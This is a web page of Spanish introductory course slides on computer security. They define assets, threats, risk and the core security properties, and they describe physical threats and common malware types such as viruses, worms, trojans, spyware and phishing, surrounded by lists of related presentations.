  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
58	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
59	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
60	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
ACCESO AL ORDENADOR
	
  
61	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
AUTENTICACIÓN DE LOS USUARIOS
	
  
62	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
AUTENTICACIÓN DE LOS USUARIOS
	
  
63	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
AUTENTICACIÓN DE LOS USUARIOS
	
  
64	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
AUTENTICACIÓN DE LOS USUARIOS
	
  
65	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
AUTENTICACIÓN DE LOS USUARIOS
	
  
66	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
BACKUPS
	
  
67	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
BACKUPS
	
  
68	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
BACKUPS
	
  
69	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
BACKUPS
	
  
70	
  
	
  
Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática
	
  
4. SEGURIDAD LÓGICA
	
  
BACKUPS
	
  
71	
  
	
  

Más contenido relacionado

La actualidad más candente

La actualidad más candente (20)

Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
1 categorias-ataques
1 categorias-ataques1 categorias-ataques
1 categorias-ataques
 
Ataques Y Vulnerabilidades
Ataques Y VulnerabilidadesAtaques Y Vulnerabilidades
Ataques Y Vulnerabilidades
 
01 ataques informaticos
01 ataques informaticos01 ataques informaticos
01 ataques informaticos
 
Seguridad de la informacion redes sociales
Seguridad de la informacion redes socialesSeguridad de la informacion redes sociales
Seguridad de la informacion redes sociales
 
Tipos de Ataques Informaticos
Tipos de Ataques InformaticosTipos de Ataques Informaticos
Tipos de Ataques Informaticos
 
Ataque a la red de datos, diapositivas
Ataque a la red de datos, diapositivasAtaque a la red de datos, diapositivas
Ataque a la red de datos, diapositivas
 
Seguridad privada
Seguridad privadaSeguridad privada
Seguridad privada
 
Seguridad
SeguridadSeguridad
Seguridad
 
S1 cdsi1-2
S1 cdsi1-2S1 cdsi1-2
S1 cdsi1-2
 
Tipos De Ataques Clase 03
Tipos De Ataques  Clase 03Tipos De Ataques  Clase 03
Tipos De Ataques Clase 03
 
S4 cdsi1-1
S4 cdsi1-1S4 cdsi1-1
S4 cdsi1-1
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Tarea tecnología n2
Tarea tecnología n2Tarea tecnología n2
Tarea tecnología n2
 
Unidad 4
Unidad 4Unidad 4
Unidad 4
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Tipos de ataques informaticos
Tipos de ataques informaticosTipos de ataques informaticos
Tipos de ataques informaticos
 
Revista de informatica
Revista de informaticaRevista de informatica
Revista de informatica
 
Seguridad Informatica y Ethical Hacking
Seguridad Informatica y Ethical HackingSeguridad Informatica y Ethical Hacking
Seguridad Informatica y Ethical Hacking
 
Seguridad informática
Seguridad  informáticaSeguridad  informática
Seguridad informática
 

Similar a Seguridad informática: amenazas, malware y hackers

Ensayo de seguridad informática
Ensayo de seguridad informáticaEnsayo de seguridad informática
Ensayo de seguridad informáticaronaldlezama
 
PROBLEMAS Y SOLUCIONES DE SEGURIDAD INFORMATICA
PROBLEMAS Y SOLUCIONES DE SEGURIDAD INFORMATICAPROBLEMAS Y SOLUCIONES DE SEGURIDAD INFORMATICA
PROBLEMAS Y SOLUCIONES DE SEGURIDAD INFORMATICATIC1B
 
Seguridad informática jorge romero lydia
Seguridad informática jorge romero lydiaSeguridad informática jorge romero lydia
Seguridad informática jorge romero lydiatomotosmusic
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad InformaticaMini0986
 
Power informática
Power informáticaPower informática
Power informática10405878
 
Power informática
Power informáticaPower informática
Power informática10405878
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticaMariodbe
 
seguridad informatica 1B
seguridad informatica 1Bseguridad informatica 1B
seguridad informatica 1BJulio Hdez
 
Tics.Cuidado porque esta peligroso...
Tics.Cuidado porque esta peligroso...Tics.Cuidado porque esta peligroso...
Tics.Cuidado porque esta peligroso...mamijose
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticamariaramos777
 
Seguridad Informática - Conceptos básicos
Seguridad Informática - Conceptos básicosSeguridad Informática - Conceptos básicos
Seguridad Informática - Conceptos básicosJavichu Moya
 
Seguridad, privacidad y medidas de prevención
Seguridad, privacidad y medidas de prevenciónSeguridad, privacidad y medidas de prevención
Seguridad, privacidad y medidas de prevencióncams2796
 
Seguridad, privacidad y medidas de prevención
Seguridad, privacidad y medidas de prevenciónSeguridad, privacidad y medidas de prevención
Seguridad, privacidad y medidas de prevencióncams2796
 

Similar a Seguridad informática: amenazas, malware y hackers (20)

Ensayo de seguridad informática
Ensayo de seguridad informáticaEnsayo de seguridad informática
Ensayo de seguridad informática
 
Presentacion_1
Presentacion_1Presentacion_1
Presentacion_1
 
PROBLEMAS Y SOLUCIONES DE SEGURIDAD INFORMATICA
PROBLEMAS Y SOLUCIONES DE SEGURIDAD INFORMATICAPROBLEMAS Y SOLUCIONES DE SEGURIDAD INFORMATICA
PROBLEMAS Y SOLUCIONES DE SEGURIDAD INFORMATICA
 
Seguridad informática jorge romero lydia
Seguridad informática jorge romero lydiaSeguridad informática jorge romero lydia
Seguridad informática jorge romero lydia
 
Tarea tecnología
Tarea tecnologíaTarea tecnología
Tarea tecnología
 
Tarea tecnología
Tarea tecnologíaTarea tecnología
Tarea tecnología
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 
5to
5to5to
5to
 
Power informática
Power informáticaPower informática
Power informática
 
Power informática
Power informáticaPower informática
Power informática
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
seguridad
seguridadseguridad
seguridad
 
seguridad informatica 1B
seguridad informatica 1Bseguridad informatica 1B
seguridad informatica 1B
 
Presentación 2
Presentación 2Presentación 2
Presentación 2
 
Tics.Cuidado porque esta peligroso...
Tics.Cuidado porque esta peligroso...Tics.Cuidado porque esta peligroso...
Tics.Cuidado porque esta peligroso...
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Seguridad 1
Seguridad 1Seguridad 1
Seguridad 1
 
Seguridad Informática - Conceptos básicos
Seguridad Informática - Conceptos básicosSeguridad Informática - Conceptos básicos
Seguridad Informática - Conceptos básicos
 
Seguridad, privacidad y medidas de prevención
Seguridad, privacidad y medidas de prevenciónSeguridad, privacidad y medidas de prevención
Seguridad, privacidad y medidas de prevención
 
Seguridad, privacidad y medidas de prevención
Seguridad, privacidad y medidas de prevenciónSeguridad, privacidad y medidas de prevención
Seguridad, privacidad y medidas de prevención
 

Más de Francesc Perez

Conmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPConmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPFrancesc Perez
 
Conmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónConmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónFrancesc Perez
 
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Francesc Perez
 
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Francesc Perez
 
Enrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solEnrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solFrancesc Perez
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2 Francesc Perez
 
Seguridad: Backtrack1_bis
Seguridad: Backtrack1_bisSeguridad: Backtrack1_bis
Seguridad: Backtrack1_bisFrancesc Perez
 
Seguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónSeguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónFrancesc Perez
 
Sistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorSistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorFrancesc Perez
 
Exercici html5, js y css3
Exercici html5, js y css3Exercici html5, js y css3
Exercici html5, js y css3Francesc Perez
 
Ejercicios funciones lógicas
Ejercicios funciones lógicasEjercicios funciones lógicas
Ejercicios funciones lógicasFrancesc Perez
 
Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales   pràctica 1Sistemas electrónicos digitales   pràctica 1
Sistemas electrónicos digitales pràctica 1Francesc Perez
 
Sistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleSistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleFrancesc Perez
 
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Francesc Perez
 
Sistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleSistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleFrancesc Perez
 

Más de Francesc Perez (20)

ICT Parte 1/2
ICT Parte 1/2ICT Parte 1/2
ICT Parte 1/2
 
Conmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPConmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTP
 
Conmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónConmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP Solución
 
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
 
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
 
Enrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solEnrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 sol
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 
Seguridad: Backtrack1_bis
Seguridad: Backtrack1_bisSeguridad: Backtrack1_bis
Seguridad: Backtrack1_bis
 
Seguridad: Backtrack1
Seguridad: Backtrack1Seguridad: Backtrack1
Seguridad: Backtrack1
 
Seguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónSeguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode Solución
 
Sistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorSistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: Multiplexador
 
Js api formularios
Js api formulariosJs api formularios
Js api formularios
 
Exercici html5, js y css3
Exercici html5, js y css3Exercici html5, js y css3
Exercici html5, js y css3
 
Ejercicios funciones lógicas
Ejercicios funciones lógicasEjercicios funciones lógicas
Ejercicios funciones lógicas
 
Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales   pràctica 1Sistemas electrónicos digitales   pràctica 1
Sistemas electrónicos digitales pràctica 1
 
html5 multimedia
 html5 multimedia html5 multimedia
html5 multimedia
 
Sistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleSistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de boole
 
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
 
Estudio del PC
Estudio del PCEstudio del PC
Estudio del PC
 
Sistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleSistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de boole
 

Último

SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024gharce
 
Plan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPEPlan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPELaura Chacón
 
PPT_Formación integral y educación CRESE (1).pdf
PPT_Formación integral y educación CRESE (1).pdfPPT_Formación integral y educación CRESE (1).pdf
PPT_Formación integral y educación CRESE (1).pdfEDILIAGAMBOA
 
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...fcastellanos3
 
TRIPTICO-SISTEMA-MUSCULAR. PARA NIÑOS DE PRIMARIA
TRIPTICO-SISTEMA-MUSCULAR. PARA NIÑOS DE PRIMARIATRIPTICO-SISTEMA-MUSCULAR. PARA NIÑOS DE PRIMARIA
TRIPTICO-SISTEMA-MUSCULAR. PARA NIÑOS DE PRIMARIAAbelardoVelaAlbrecht1
 
Fundamentos y Principios de Psicopedagogía..pdf
Fundamentos y Principios de Psicopedagogía..pdfFundamentos y Principios de Psicopedagogía..pdf
Fundamentos y Principios de Psicopedagogía..pdfsamyarrocha1
 
Uses of simple past and time expressions
Uses of simple past and time expressionsUses of simple past and time expressions
Uses of simple past and time expressionsConsueloSantana3
 
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdf
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdfFisiologia.Articular. 3 Kapandji.6a.Ed.pdf
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdfcoloncopias5
 
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARONARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFAROJosé Luis Palma
 
LA OVEJITA QUE VINO A CENAR CUENTO INFANTIL.pdf
LA OVEJITA QUE VINO A CENAR CUENTO INFANTIL.pdfLA OVEJITA QUE VINO A CENAR CUENTO INFANTIL.pdf
LA OVEJITA QUE VINO A CENAR CUENTO INFANTIL.pdfNataliaMalky1
 
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdfBIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdfCESARMALAGA4
 
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxc3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxMartín Ramírez
 
PLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docx
PLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docxPLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docx
PLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docxJUANSIMONPACHIN
 
Día de la Madre Tierra-1.pdf día mundial
Día de la Madre Tierra-1.pdf día mundialDía de la Madre Tierra-1.pdf día mundial
Día de la Madre Tierra-1.pdf día mundialpatriciaines1993
 
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxPresentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxYeseniaRivera50
 
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...JAVIER SOLIS NOYOLA
 
Estrategias de enseñanza - aprendizaje. Seminario de Tecnologia..pptx.pdf
Estrategias de enseñanza - aprendizaje. Seminario de Tecnologia..pptx.pdfEstrategias de enseñanza - aprendizaje. Seminario de Tecnologia..pptx.pdf
Estrategias de enseñanza - aprendizaje. Seminario de Tecnologia..pptx.pdfAlfredoRamirez953210
 
TEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdfTEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdfDannyTola1
 

Último (20)

SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
SISTEMA INMUNE FISIOLOGIA MEDICA UNSL 2024
 
Plan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPEPlan Año Escolar Año Escolar 2023-2024. MPPE
Plan Año Escolar Año Escolar 2023-2024. MPPE
 
PPT_Formación integral y educación CRESE (1).pdf
PPT_Formación integral y educación CRESE (1).pdfPPT_Formación integral y educación CRESE (1).pdf
PPT_Formación integral y educación CRESE (1).pdf
 
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
 
Sesión La luz brilla en la oscuridad.pdf
Sesión  La luz brilla en la oscuridad.pdfSesión  La luz brilla en la oscuridad.pdf
Sesión La luz brilla en la oscuridad.pdf
 
TRIPTICO-SISTEMA-MUSCULAR. PARA NIÑOS DE PRIMARIA
TRIPTICO-SISTEMA-MUSCULAR. PARA NIÑOS DE PRIMARIATRIPTICO-SISTEMA-MUSCULAR. PARA NIÑOS DE PRIMARIA
TRIPTICO-SISTEMA-MUSCULAR. PARA NIÑOS DE PRIMARIA
 
Fundamentos y Principios de Psicopedagogía..pdf
Fundamentos y Principios de Psicopedagogía..pdfFundamentos y Principios de Psicopedagogía..pdf
Fundamentos y Principios de Psicopedagogía..pdf
 
Uses of simple past and time expressions
Uses of simple past and time expressionsUses of simple past and time expressions
Uses of simple past and time expressions
 
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdf
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdfFisiologia.Articular. 3 Kapandji.6a.Ed.pdf
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdf
 
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARONARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
 
LA OVEJITA QUE VINO A CENAR CUENTO INFANTIL.pdf
LA OVEJITA QUE VINO A CENAR CUENTO INFANTIL.pdfLA OVEJITA QUE VINO A CENAR CUENTO INFANTIL.pdf
LA OVEJITA QUE VINO A CENAR CUENTO INFANTIL.pdf
 
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdfBIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
BIOLOGIA_banco de preguntas_editorial icfes examen de estado .pdf
 
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxc3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
 
PLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docx
PLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docxPLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docx
PLANIFICACION ANUAL 2024 - INICIAL UNIDOCENTE.docx
 
Día de la Madre Tierra-1.pdf día mundial
Día de la Madre Tierra-1.pdf día mundialDía de la Madre Tierra-1.pdf día mundial
Día de la Madre Tierra-1.pdf día mundial
 
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxPresentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
 
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...
LA ECUACIÓN DEL NÚMERO PI EN LOS JUEGOS OLÍMPICOS DE PARÍS. Por JAVIER SOLIS ...
 
PPTX: La luz brilla en la oscuridad.pptx
PPTX: La luz brilla en la oscuridad.pptxPPTX: La luz brilla en la oscuridad.pptx
PPTX: La luz brilla en la oscuridad.pptx
 
Estrategias de enseñanza - aprendizaje. Seminario de Tecnologia..pptx.pdf
Estrategias de enseñanza - aprendizaje. Seminario de Tecnologia..pptx.pdfEstrategias de enseñanza - aprendizaje. Seminario de Tecnologia..pptx.pdf
Estrategias de enseñanza - aprendizaje. Seminario de Tecnologia..pptx.pdf
 
TEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdfTEST DE RAVEN es un test conocido para la personalidad.pdf
TEST DE RAVEN es un test conocido para la personalidad.pdf
 

Seguridad informática: amenazas, malware y hackers

  • 1. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   1. INTRODUCCIÓN   ¿Qué activos se deben proteger?   • Hardware: estaciones de trabajo, servidores, routers, switches, firewalls, centralitas privadas de telefonía, …  • Software: sistemas operativos y aplicaciones, firmware de los dispositivos de red.  • Datos: almacenados y transferidos a través de una red privada ó pública.   ¿Cómo se protegen estos activos?   • Seguridad física: se definen métodos para garantizar la seguridad del hardware  • Seguridad lógica: se definen métodos para garantizar la seguridad del software y de los datos   Definiciones:   •  Amenaza una persona, cosa, evento o idea que supone algún peligro para un activo (en términos de confidencialidad, integridad, disponibilidad o uso legítimo)  • Ataque: es la realización de una amenaza.  • Defensas: medidas de protección ante las amenazas.  • Vulnerabilidades: puntos débiles en las defensas o inexistencia de éstas.   1    
  • 2. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   1. INTRODUCCIÓN   2    
  • 3. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   1. INTRODUCCIÓN   Riesgo   Medida del coste de una vulnerabilidad (teniendo en cuenta la ejecución de un ataque exitoso). El riesgo es  alto si valor_activo*probailidad_exito_ataque es elevada. El riesgo es bajo si valor_activo*probailidad_exito_ ataque es bajo.   Ejemplo de modelo para la valoración del riesgo de un activo   Metodologías para valoración de riesgos:   • CERT  • Microsoft  • NIST   3    
  • 4. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   1. INTRODUCCIÓN   ¿Es posible proteger totalmente un activo?   Cuatro condiciones son necesarias para considerar que un activo informático está asegurado casi al 100%:  • Confidencialidad: la información es almacenada o enviada a través de la red oculta para cualquier usuario excepto para el destinatario final. Se suele garantizar la confidencialidad con el cifrado de la información.  • Autenticación: la persona, proceso o activo que acceda a la información debe previamente ser autenticado. La autenticación puede conseguirse mediante uno (o más de uno) de los siguientes factores:   • Integridad: protección de datos ante la modificación de la información. Este servicio se facilita mediante un mecanismo de criptografía denominado Message Authentication Code o firma digital.  • No repudio: cualidad por la que una persona u ordenador no puede negar haber realizado una transmisión.   Modelo de red segura   4    
  • 5. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Amenazas físicas   Dentro de las amenazas físicas podemos englobar cualquier error o daño en el hardware que se puede presentar en cualquier momento. Por ejemplo, daños en discos duros, en los procesadores, errores de funcionamiento de la memoria, etc. Todos ellos hacen que la información o no esté accesible o no sea fiable.   Otro tipo de amenazas físicas son las catástrofes naturales. Por ejemplo hay zonas geográficas del planeta en las que las probabilidades de sufrir terremotos, huracanes, inundaciones, etc, son mucho mas elevadas. En estos casos en los que es la propia Naturaleza la que ha provocado el desastre de seguridad, no por ello hay que descuidarlo e intentar prever al máximo este tipo de situaciones.   Hay otro tipo de catástrofes que se conocen como de riesgo poco probable. Dentro de este grupo tenemos los  taques nucleares, impactos de meteoritos, etc. y que, aunque se sabe que están ahí, las probabilidades de que se desencadenen son muy bajas y en principio no se toman medidas contra ellos.   Windsord   Indonesia Robos Fokushima   Corte eléctrico   5    
  • 6. Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática   2. AMENAZAS   Amenazas lógicas: código Malicioso o MALWARE (MAlicious softWARE)   Existen desde mediados de los ’80. Inicialmente la distribuciyn se realizaba a partir de la tecnología de  intercambio de información más popular: el diskette. Desde entonces, los avances en las tecnologías de redes y en los diversos servicios de intercambio de informaciyn han sido aprovechados por formas diversas de “cydigo malicioso”:  • Virus: malware que tiene por objeto alterar el normal funcionamiento de la computadora, sin el permiso o   el conocimiento del usuario. Los virus, habitualmente, reemplazan archivos ejecutables por otros infectados con el código de este. Los virus informáticos tienen, básicamente, la función de propagarse a través de un software, no se replican a sí mismos porque no tienen esa facultad como el gusano informático, son muy  nocivos y algunos contienen además una carga dañina (payload) con distintos objetivos  • Spyware: Programas espía que recopilan información sobre una persona o una organización sin su   conocimiento. Esta información luego puede ser cedida o vendida a empresas publicitarias. Pueden recopilar información del teclado de la víctima pudiendo así conocer contraseña o nº de cuentas bancarias o pines.  • Adware: Programas que abren ventanas emergentes mostrando publicidad de productos y servicios. Se suele utilizar para subvencionar la aplicación y que el usuario pueda bajarla gratis u obtener un descuento. Normalmente el usuario es consciente de ello y da su permiso.  • Worms (“Gusanos”): tienen la capacidad de replicarse a si mismos y son independientes de otros programas o componentes de software. Infectan todos los host de una red gracias a la infraestructura de datos actual.  • Troyanos. Programas con “doble cara”: exterior benigno, interior destructivo. Al ejecutar el programa el usuario suele ser distraído por un programa afable mientras que en background se está ejecutando otra aplicación con fines dudosos, generalmente suele ser una puerta trasera o backdoor.  • Phising: Intenta conseguir información confidencial de forma fraudulenta (conseguir contraseñas o pines   bancarios) haciendo una suplantación de identidad. Para ello el estafador se hace pasar por una persona o  empresa de la confianza del usuario mediante un correo electrónico oficial o mensajería instantánea, y de esta forma conseguir la información.  • Spam: Recepción de mensajes no solicitados. Se suele utilizar esta técnica en los correos electrónicos, mensajería instantánea y mensajes a móviles.  • Bots: programas que realizan de forma automática acciones que podría hacer una persona. Crear usuarios irreales en webs, realizar ataques de diccionario o fuerza bruta, …   6    
